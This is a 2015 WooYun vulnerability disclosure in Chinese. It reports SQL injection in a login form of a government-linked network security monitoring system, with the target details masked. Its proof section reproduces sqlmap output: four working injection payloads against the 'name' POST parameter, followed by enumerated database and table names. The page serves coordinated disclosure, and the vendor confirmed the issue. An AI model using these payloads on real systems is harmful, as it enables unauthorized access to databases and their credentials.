当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101208

漏洞标题:某市敏感单位某网络安全监测系统存在sql注入

相关厂商:某市敏感单位

漏洞作者: YY-2012

提交时间:2015-03-16 15:05

修复时间:2015-05-01 14:28

公开时间:2015-05-01 14:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-16: 细节已通知厂商并且等待厂商处理中
2015-03-17: 厂商已经确认,细节仅向厂商公开
2015-03-27: 细节向核心白帽子及相关领域专家公开
2015-04-06: 细节向普通白帽子公开
2015-04-16: 细节向实习白帽子公开
2015-05-01: 细节向公众公开

简要描述:

rt

详细说明:

mask 区域
*****^络安全监^*****
1.http://**.**.**/_
*****^^注^*****
**********
*****aspx?oper=lo*****
*****.8.15*****
*****ion: ke*****
*****ength*****
*****l Mac OS X; U; en) P*****
*****//202.8*****
*****h: XMLHt*****
*****ersion:*****
*****on/x-www-for*****
*****t: *****
*****/202.8.1*****
*****: gzip, *****
*****: zh-CN,*****
**********
*****015 16:19:08 GMT+0800 (??-??*****

漏洞证明:

aaaaaaaa111111111111.jpg


sqlmap identified the following injection points with a total of 27006 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: name=-9817' OR 3628=3628#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: name=-2869' OR 1 GROUP BY CONCAT(0x71716b6a71,(SELECT (CASE WHEN (9179=9179) THEN 1 ELSE 0 END)),0x7162766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: name=asd';(SELECT * FROM (SELECT(SLEEP(5)))aQYR)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT - comment)
Payload: name=asd' AND (SELECT * FROM (SELECT(SLEEP(5)))dyUO)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: name=-9817' OR 3628=3628#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: name=-2869' OR 1 GROUP BY CONCAT(0x71716b6a71,(SELECT (CASE WHEN (9179=9179) THEN 1 ELSE 0 END)),0x7162766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: name=asd';(SELECT * FROM (SELECT(SLEEP(5)))aQYR)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT - comment)
Payload: name=asd' AND (SELECT * FROM (SELECT(SLEEP(5)))dyUO)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.11
Database: netalarm
[23 tables]
+---------------------------------------+
| sysuser |
| tbnetalarm |
| tbwsba |
| xk_article |
| xk_channel |
| xk_collection |
| xk_collitem |
| xk_column |
| xk_diss |
| xk_friendlink |
| xk_master |
| xk_photo |
| xk_placard |
| xk_review |
| xk_soft |
| xk_source |
| xk_system |
| xk_templabel |
| xk_template |
| xk_tempproject |
| xk_user |
| xk_usergroup |
| xk_vote |
+---------------------------------------+
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[17 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-17 14:27

厂商回复:

验证确认所描述的问题,已通知其修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-16 16:02 | 大漠長河 ( 实习白帽子 | Rank:43 漏洞数:7 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区欢迎您...)

    看样子是公安系统的